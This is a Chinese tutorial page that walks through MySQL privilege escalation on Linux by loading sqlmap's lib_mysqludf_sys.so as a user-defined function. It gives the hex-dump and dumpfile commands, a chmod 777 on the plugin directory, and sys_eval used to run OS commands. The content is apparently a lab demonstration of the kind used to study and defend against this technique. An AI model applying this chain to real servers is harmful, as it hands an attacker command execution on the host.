当前位置: 首页 > 编程笔记 >

Linux利用UDF库实现Mysql提权

王兴腾
2023-03-14
本文向大家介绍Linux利用UDF库实现Mysql提权,包括了Linux利用UDF库实现Mysql提权的使用技巧和注意事项,需要的朋友参考一下

环境:
os:linux(bt5)
 
database:mysql
 
简述:
通过自定义库函数来实现执行任意的程序,这里只在linux下测试通过,具体到windows,所用的dll自然不同。
 
要求:
 在mysql库下必须有func表,并且在‑‑skip‑grant‑tables开启的情况下,UDF会被禁止;
 
过程: 得到插件库路径 找对应操作系统的udf库文件 利用udf库文件加载函数并执行命令

1,得到插件库路径

mysql> show variables like "%plugin%";
+---------------+-----------------------+
| Variable_name | Value         |
+---------------+-----------------------+
| plugin_dir  | /usr/lib/mysql/plugin |
+---------------+-----------------------+
1 row in set (0.00 sec)

2,找对应操作系统的udf库文件
因为自己测试,看了下自己系统的版本,64位
 

root@bt:~# uname -a
Linux bt 3.2.6 #1 SMP Fri Feb 17 10:34:20 EST 2012 x86_64 GNU/Linux

 
对于udf文件,在sqlmap工具中自带就有,只要找对应操作系统的版本即可

root@bt:/pentest/database/sqlmap/udf/mysql# ls
linux windows
root@bt:/pentest/database/sqlmap/udf/mysql/linux# ls
32 64
root@bt:/pentest/database/sqlmap/udf/mysql/linux/64# ls
lib_mysqludf_sys.so

3,利用udf库文件加载函数并执行命令
首先要得到udf库文件的十六进制格式,可在本地通过
 

mysql> select hex(load_file('/pentest/database/sqlmap/udf/mysql/linux/64/lib_mysqludf_sys.so')) into outfile '/tmp/udf.txt';
Query OK, 1 row affected (0.04 sec)

 
因为我测试时,使用自带账户,账户名mysql,并不是root,所以插件目录不可写,而实际中,一般udf提权都是用root权限启动的mysql程序,故,不存在目录权限不足,不能访问的情况。为了继续,修改目录权限
 
root@bt:~# chmod 777 /usr/lib/mysql/plugin
 
数据库中写入udf库到mysql库目录:
 

mysql> select unhex('7F454C46020...') into dumpfile '/usr/lib/mysql/plugin/mysqludf.so';
Query OK, 1 row affected (0.04 sec)

 
查看下这个udf库所支持的函数

root@bt:~# nm -D /usr/lib/mysql/plugin/mysqludf.so
         w _Jv_RegisterClasses
0000000000201788 A __bss_start
         w __cxa_finalize
         w __gmon_start__
0000000000201788 A _edata
0000000000201798 A _end
0000000000001178 T _fini
0000000000000ba0 T _init
         U fgets
         U fork
         U free
         U getenv
000000000000101a T lib_mysqludf_sys_info
0000000000000da4 T lib_mysqludf_sys_info_deinit
0000000000001047 T lib_mysqludf_sys_info_init
         U malloc
         U mmap
         U pclose
         U popen
         U realloc
         U setenv
         U strcpy
         U strncpy
0000000000000dac T sys_bineval
0000000000000dab T sys_bineval_deinit
0000000000000da8 T sys_bineval_init
0000000000000e46 T sys_eval
0000000000000da7 T sys_eval_deinit
0000000000000f2e T sys_eval_init
0000000000001066 T sys_exec
0000000000000da6 T sys_exec_deinit
0000000000000f57 T sys_exec_init
00000000000010f7 T sys_get
0000000000000da5 T sys_get_deinit
0000000000000fea T sys_get_init
000000000000107a T sys_set
00000000000010e8 T sys_set_deinit
0000000000000f80 T sys_set_init
         U sysconf
         U system
         U waitpid

最后,加载函数并执行:

mysql> create function sys_eval returns string soname "mysqludf.so";
Query OK, 0 rows affected (0.14 sec)
 
mysql> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql       |
+--------------------+
1 row in set (0.04 sec)
 
mysql> select * from mysql.func;
+----------+-----+-------------+----------+
| name   | ret | dl     | type   |
+----------+-----+-------------+----------+
| sys_eval |  0 | mysqludf.so | function |
+----------+-----+-------------+----------+
1 row in set
 类似资料:
  • 本文向大家介绍Linux下实现C++操作Mysql数据库,包括了Linux下实现C++操作Mysql数据库的使用技巧和注意事项,需要的朋友参考一下 想用C++写项目,数据库是必须的,所以这两天学了一下C++操作MySQL数据库的方法。也没有什么教程,就是在网上搜的知识,下面汇总一下。 连接MySQL数据库有两种方法:第一种是使用ADO连接,不过这种只适合Windows平台;第二种是使用MySQL自

  • 本文向大家介绍Mysql 5.7.18 利用MySQL proxies_priv实现类似用户组管理,包括了Mysql 5.7.18 利用MySQL proxies_priv实现类似用户组管理的使用技巧和注意事项,需要的朋友参考一下 利用 MySQL proxies_priv(模拟角色)实现类似用户组管理 角色(Role)可以用来批量管理用户,同一个角色下的用户,拥有相同的权限。 MySQL5.7.

  • Webservice->实现层->Dao层。 实现层实际上将DAO对象转换为业务对象,并将其传递回服务。 我的目标是为服务层编写JUnit。现在,为了实现这一点,我使用@mock和@injectmocks来模拟实现层中的值,因为实现层使用的是spring注释字段。但每次测试时都会出现空指针异常。下面是代码 测试类: 但它并不是在嘲弄价值,如 当(managera.consulterfichesol

  • 本文向大家介绍如何利用FluentMigrator实现数据库迁移,包括了如何利用FluentMigrator实现数据库迁移的使用技巧和注意事项,需要的朋友参考一下 FluentMigrator Fluent Migrator是一个基于.NET的迁移框架,你可以像使用Ruby on Rails Migrations一样使用它。Fluent Migrator的最新版本是3.13版,官网地址https:

  • 本文向大家介绍在Linux中利用yum安装JDK的实现步骤,包括了在Linux中利用yum安装JDK的实现步骤的使用技巧和注意事项,需要的朋友参考一下 一、卸载centos自带的jdk 1.查看当前的jdk版本,并卸载 二、安装Jdk 1.查找java相关得列表  或    2.安装jdk 3.安装完成之后,验证 4.通过yum默认安装的路径为   /usr/lib/jvm 如果机器上同时安装了多

  • 我看到这样一个udf: https://github.com/edwardcapriolo/hive-geoip 如何在Hive中利用udf?我可以自己创建函数名吗?